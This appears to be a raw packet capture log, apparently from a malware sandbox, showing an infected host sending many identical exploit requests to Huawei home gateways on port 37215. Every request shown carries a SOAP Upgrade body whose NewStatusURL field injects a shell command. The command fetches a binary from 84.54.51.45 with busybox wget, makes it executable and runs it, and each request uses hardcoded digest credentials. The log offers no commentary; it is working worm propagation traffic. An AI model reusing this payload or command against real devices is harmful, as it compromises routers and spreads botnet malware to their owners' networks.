                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2268192.168.2.153375241.83.210.18037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673180103 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2269192.168.2.155161841.147.3.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673183918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2270192.168.2.155698041.22.186.437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673430920 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2271192.168.2.154585041.186.131.4737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673434973 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2272192.168.2.155464841.79.161.18737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673438072 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2273192.168.2.153861641.16.45.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673474073 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2274192.168.2.154323641.183.134.15837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673475027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2275192.168.2.155041641.133.253.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673499107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2276192.168.2.155953841.120.190.9937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673546076 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2277192.168.2.154397841.216.173.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673548937 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 